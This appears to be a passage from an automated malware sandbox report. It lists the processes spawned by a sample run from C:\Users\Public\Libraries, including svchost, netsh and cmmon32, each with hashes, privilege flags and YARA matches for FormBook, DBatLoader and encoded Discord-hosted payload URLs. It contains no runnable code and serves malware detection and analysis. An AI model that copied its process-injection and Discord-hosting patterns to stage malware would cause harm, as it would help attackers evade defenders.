                                                • Rule: JoeSecurity_DBatLoader, Description: Yara detected DBatLoader, Source: 0000000E.00000002.341748115.00000000023CA000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 0000000E.00000000.311802519.0000000000471000.00000008.00020000.sdmp, Author: Florian Roth
                                                • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 0000000E.00000002.340669316.0000000000473000.00000008.00020000.sdmp, Author: Florian Roth
                                                • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 0000000E.00000003.314083607.0000000002E64000.00000004.00000001.sdmp, Author: Florian Roth
                                                • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 0000000E.00000002.342364275.0000000002540000.00000004.00000001.sdmp, Author: Florian Roth
                                                • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 0000000E.00000002.342777768.0000000002E18000.00000004.00000001.sdmp, Author: Florian Roth
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000002.344615854.0000000003DEC000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000002.344615854.0000000003DEC000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000002.344615854.0000000003DEC000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000E.00000003.339915553.0000000003E70000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000E.00000003.339915553.0000000003E70000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000E.00000003.339915553.0000000003E70000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                General

                                                Start time:20:36:13
                                                Start date:13/10/2021
                                                Path:C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe
                                                Imagebase:0x400000
                                                File size:796160 bytes
                                                MD5 hash:E954C3D029B943B054FCEB27E5E24D2D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.371020252.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.371020252.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.371020252.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.373751532.00000000008E0000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.373751532.00000000008E0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.373751532.00000000008E0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000011.00000000.320572808.0000000000471000.00000008.00020000.sdmp, Author: Florian Roth
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000001.321255326.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000001.321255326.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000001.321255326.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000011.00000002.371342896.0000000000430000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000011.00000002.371342896.0000000000430000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000011.00000002.371342896.0000000000430000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                General

                                                Start time:20:36:21
                                                Start date:13/10/2021
                                                Path:C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Users\Public\Libraries\Nyedvqj\Nyedvqj.exe
                                                Imagebase:0x400000
                                                File size:796160 bytes
                                                MD5 hash:E954C3D029B943B054FCEB27E5E24D2D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.403434949.00000000009D0000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.403434949.00000000009D0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.403434949.00000000009D0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.402942283.0000000000590000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.402942283.0000000000590000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.402942283.0000000000590000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000012.00000000.339113202.0000000000471000.00000008.00020000.sdmp, Author: Florian Roth
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.402671981.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.402671981.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.402671981.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000001.339931194.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000001.339931194.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000001.339931194.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:low

                                                General

                                                Start time:20:36:31
                                                Start date:13/10/2021
                                                Path:C:\Windows\SysWOW64\svchost.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\svchost.exe
                                                Imagebase:0x1a0000
                                                File size:44520 bytes
                                                MD5 hash:FA6C268A5B5BDA067A901764D203D433
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000013.00000002.380908074.0000000002B20000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000013.00000002.380908074.0000000002B20000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000013.00000002.380908074.0000000002B20000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                General

                                                Start time:20:36:32
                                                Start date:13/10/2021
                                                Path:C:\Windows\SysWOW64\netsh.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\netsh.exe
                                                Imagebase:0x11f0000
                                                File size:82944 bytes
                                                MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: SUSP_Encoded_Discord_Attachment_Oct21_1, Description: Detects suspicious encoded URL to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: 00000014.00000002.530165789.0000000003416000.00000004.00000001.sdmp, Author: Florian Roth
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.527535096.0000000000BD0000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.527535096.0000000000BD0000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.527535096.0000000000BD0000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.532932295.0000000003630000.00000004.00000001.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.532932295.0000000003630000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.532932295.0000000003630000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000014.00000002.532637283.0000000003600000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000014.00000002.532637283.0000000003600000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000014.00000002.532637283.0000000003600000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:high

                                                General

                                                Start time:20:36:47
                                                Start date:13/10/2021
                                                Path:C:\Windows\SysWOW64\cmmon32.exe
                                                Wow64 process (32bit):true
                                                Commandline:C:\Windows\SysWOW64\cmmon32.exe
                                                Imagebase:0x1070000
                                                File size:36864 bytes
                                                MD5 hash:2879B30A164B9F7671B5E6B2E9F8DFDA
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Yara matches:
                                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000016.00000002.405522216.0000000000D60000.00000040.00020000.sdmp, Author: Joe Security
                                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000016.00000002.405522216.0000000000D60000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000016.00000002.405522216.0000000000D60000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
                                                Reputation:moderate

                                                Disassembly

                                                Code Analysis

                                                Reset < >